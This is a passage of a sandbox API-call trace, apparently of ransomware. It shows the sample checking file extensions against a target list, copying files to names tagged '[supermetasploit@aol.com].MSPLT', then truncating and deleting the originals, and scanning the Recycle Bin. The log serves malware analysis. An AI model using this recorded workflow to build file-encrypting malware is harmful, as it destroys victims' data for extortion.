lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.647] lstrlenW (lpString=".xls") returned 4 [0320.647] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.647] lstrlenW (lpString=".xlsx") returned 5 [0320.647] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.647] lstrlenW (lpString=".ppt") returned 4 [0320.647] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.648] lstrlenW (lpString=".zip") returned 4 [0320.648] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.648] lstrlenW (lpString=".rar") returned 4 [0320.648] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.648] lstrlenW (lpString=".bz2") returned 4 [0320.648] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.648] lstrlenW (lpString=".7z") returned 3 [0320.648] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.648] lstrlenW (lpString=".dbf") returned 4 [0320.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.648] lstrlenW (lpString=".1cd") returned 4 [0320.648] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.648] lstrlenW (lpString=".jpg") returned 4 [0320.648] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.648] lstrlenW (lpString=".doc") returned 4 [0320.648] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.648] lstrlenW (lpString=".docx") returned 5 [0320.648] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.648] lstrlenW (lpString=".pdf") returned 4 [0320.648] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.648] lstrlenW (lpString=".xls") returned 4 [0320.649] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.649] lstrlenW (lpString=".xlsx") returned 5 [0320.649] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.649] lstrlenW (lpString=".ppt") returned 4 [0320.649] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.649] lstrlenW (lpString=".zip") returned 4 [0320.649] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.649] lstrlenW (lpString=".rar") returned 4 [0320.649] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.649] lstrlenW (lpString=".bz2") returned 4 [0320.649] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.649] lstrlenW (lpString=".7z") returned 3 [0320.649] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.649] lstrlenW (lpString=".dbf") returned 4 [0320.649] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.649] lstrlenW (lpString=".1cd") returned 4 [0320.649] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.649] lstrlenW (lpString=".jpg") returned 4 [0320.649] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.649] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.650] lstrlenW (lpString="DD01157_.WMF") returned 12 [0320.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0320.651] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=3588) returned 1 [0320.651] CloseHandle (hObject=0x488) returned 1 [0320.651] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf")) returned 0x220 [0320.651] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0320.652] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.652] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0320.653] GetLastError () returned 0x0 [0320.653] ReadFile (in: hFile=0x488, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0xe04, lpOverlapped=0x0) returned 1 [0320.655] WriteFile (in: hFile=0x548, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xe10, lpOverlapped=0x0) returned 1 [0320.657] ReadFile (in: hFile=0x488, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.657] WriteFile (in: hFile=0x548, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.657] SetEndOfFile (hFile=0x548) returned 1 [0320.689] CloseHandle (hObject=0x548) returned 1 [0320.689] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.689] SetEndOfFile (hFile=0x488) returned 1 [0320.737] CloseHandle (hObject=0x488) returned 1 [0320.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.739] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf")) returned 1 [0320.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.740] lstrlenW (lpString=".doc") returned 4 [0320.740] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.740] lstrlenW (lpString=".docx") returned 5 [0320.740] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.740] lstrlenW (lpString=".pdf") returned 4 [0320.740] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.740] lstrlenW (lpString=".xls") returned 4 [0320.740] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.740] lstrlenW (lpString=".xlsx") returned 5 [0320.740] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.740] lstrlenW (lpString=".ppt") returned 4 [0320.740] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.740] lstrlenW (lpString=".zip") returned 4 [0320.741] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.741] lstrlenW (lpString=".rar") returned 4 [0320.741] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.741] lstrlenW (lpString=".bz2") returned 4 [0320.741] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.741] lstrlenW (lpString=".7z") returned 3 [0320.741] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.741] lstrlenW (lpString=".dbf") returned 4 [0320.741] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.741] lstrlenW (lpString=".1cd") returned 4 [0320.741] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.741] lstrlenW (lpString=".jpg") returned 4 [0320.741] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.742] lstrlenW (lpString=".doc") returned 4 [0320.742] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.742] lstrlenW (lpString=".docx") returned 5 [0320.742] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.742] lstrlenW (lpString=".pdf") returned 4 [0320.742] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.742] lstrlenW (lpString=".xls") returned 4 [0320.742] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.742] lstrlenW (lpString=".xlsx") returned 5 [0320.742] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.742] lstrlenW (lpString=".ppt") returned 4 [0320.742] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.742] lstrlenW (lpString=".zip") returned 4 [0320.742] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.742] lstrlenW (lpString=".rar") returned 4 [0320.742] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.742] lstrlenW (lpString=".bz2") returned 4 [0320.742] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.743] lstrlenW (lpString=".7z") returned 3 [0320.743] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.743] lstrlenW (lpString=".dbf") returned 4 [0320.743] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.743] lstrlenW (lpString=".1cd") returned 4 [0320.743] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0320.743] lstrlenW (lpString=".jpg") returned 4 [0320.743] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.743] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.744] lstrlenW (lpString="DD01160_.WMF") returned 12 [0320.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 41 os_tid = 0xe00 [0283.094] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x38b2748 [0283.096] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x38c2750 [0283.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc480 [0283.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x50b578 [0283.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc3f0 [0283.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x3b99020 [0283.101] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc498 [0283.101] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc498, Size=0x20) returned 0x4ade30 [0283.101] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc528 [0283.101] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc528, Size=0x20) returned 0x4ae010 [0283.101] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0283.102] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0283.102] Wow64DisableWow64FsRedirection (in: OldValue=0x2d4ff50 | out: OldValue=0x2d4ff50*=0x0) returned 1 [0283.102] lstrlenW (lpString="kernel32.dll") returned 12 [0283.102] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ade30 | out: hHeap=0x470000) returned 1 [0283.102] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0283.102] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae010 | out: hHeap=0x470000) returned 1 [0283.102] Sleep (dwMilliseconds=0x64) [0283.440] lstrcmpiW (lpString1=".ini", lpString2=".MSPLT") returned -1 [0283.441] lstrlenW (lpString="desktop.ini") returned 11 [0283.441] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0283.441] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=129) returned 1 [0283.441] CloseHandle (hObject=0x348) returned 1 [0283.441] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 [0283.441] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0x26 [0283.442] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.442] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.442] lstrlenW (lpString=".doc") returned 4 [0283.442] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0283.442] lstrlenW (lpString=".docx") returned 5 [0283.442] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0283.442] lstrlenW (lpString=".pdf") returned 4 [0283.442] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0283.442] lstrlenW (lpString=".xls") returned 4 [0283.442] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0283.442] lstrlenW (lpString=".xlsx") returned 5 [0283.442] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0283.442] lstrlenW (lpString=".ppt") returned 4 [0283.442] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0283.442] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.442] lstrlenW (lpString=".zip") returned 4 [0283.442] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0283.442] lstrlenW (lpString=".rar") returned 4 [0283.442] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0283.442] lstrlenW (lpString=".bz2") returned 4 [0283.442] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0283.442] lstrlenW (lpString=".7z") returned 3 [0283.442] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0283.442] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.442] lstrlenW (lpString=".dbf") returned 4 [0283.442] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0283.442] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.443] lstrlenW (lpString=".1cd") returned 4 [0283.443] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0283.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.443] lstrlenW (lpString=".jpg") returned 4 [0283.443] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0283.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.443] lstrlenW (lpString=".doc") returned 4 [0283.443] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0283.443] lstrlenW (lpString=".docx") returned 5 [0283.443] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0283.443] lstrlenW (lpString=".pdf") returned 4 [0283.443] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0283.443] lstrlenW (lpString=".xls") returned 4 [0283.443] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0283.443] lstrlenW (lpString=".xlsx") returned 5 [0283.443] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0283.443] lstrlenW (lpString=".ppt") returned 4 [0283.443] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0283.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.443] lstrlenW (lpString=".zip") returned 4 [0283.443] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0283.443] lstrlenW (lpString=".rar") returned 4 [0283.443] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0283.443] lstrlenW (lpString=".bz2") returned 4 [0283.443] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0283.443] lstrlenW (lpString=".7z") returned 3 [0283.444] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0283.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.444] lstrlenW (lpString=".dbf") returned 4 [0283.444] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0283.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.444] lstrlenW (lpString=".1cd") returned 4 [0283.444] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0283.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0283.444] lstrlenW (lpString=".jpg") returned 4 [0283.444] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0283.444] Sleep (dwMilliseconds=0x64) [0283.688] Sleep (dwMilliseconds=0x64) [0283.948] Sleep (dwMilliseconds=0x64) [0284.307] Sleep (dwMilliseconds=0x64) [0284.480] Sleep (dwMilliseconds=0x64) [0284.825] Sleep (dwMilliseconds=0x64) [0285.072] Sleep (dwMilliseconds=0x64) [0285.384] Sleep (dwMilliseconds=0x64) [0285.702] Sleep (dwMilliseconds=0x64) [0285.966] Sleep (dwMilliseconds=0x64) [0286.274] Sleep (dwMilliseconds=0x64) [0286.452] Sleep (dwMilliseconds=0x64) [0286.571] Sleep (dwMilliseconds=0x64) [0287.482] Sleep (dwMilliseconds=0x64) [0287.669] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.669] lstrlenW (lpString="boxed-correct.avi") returned 17 [0287.669] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0287.838] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=111320) returned 1 [0287.838] CloseHandle (hObject=0x434) returned 1 [0287.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0287.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.862] lstrlenW (lpString=".doc") returned 4 [0287.862] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.862] lstrlenW (lpString=".docx") returned 5 [0287.862] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0287.862] lstrlenW (lpString=".pdf") returned 4 [0287.862] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.862] lstrlenW (lpString=".xls") returned 4 [0287.862] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.862] lstrlenW (lpString=".xlsx") returned 5 [0287.862] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0287.862] lstrlenW (lpString=".ppt") returned 4 [0287.862] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.862] lstrlenW (lpString=".zip") returned 4 [0287.862] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.862] lstrlenW (lpString=".rar") returned 4 [0287.862] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.862] lstrlenW (lpString=".bz2") returned 4 [0287.863] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.863] lstrlenW (lpString=".7z") returned 3 [0287.863] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.863] lstrlenW (lpString=".dbf") returned 4 [0287.863] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.863] lstrlenW (lpString=".1cd") returned 4 [0287.863] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.863] lstrlenW (lpString=".jpg") returned 4 [0287.863] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.863] lstrlenW (lpString=".doc") returned 4 [0287.863] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.863] lstrlenW (lpString=".docx") returned 5 [0287.863] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0287.863] lstrlenW (lpString=".pdf") returned 4 [0287.863] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.863] lstrlenW (lpString=".xls") returned 4 [0287.863] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.863] lstrlenW (lpString=".xlsx") returned 5 [0287.864] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0287.864] lstrlenW (lpString=".ppt") returned 4 [0287.864] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.864] lstrlenW (lpString=".zip") returned 4 [0287.864] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.864] lstrlenW (lpString=".rar") returned 4 [0287.864] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.864] lstrlenW (lpString=".bz2") returned 4 [0287.864] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.864] lstrlenW (lpString=".7z") returned 3 [0287.864] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0287.864] 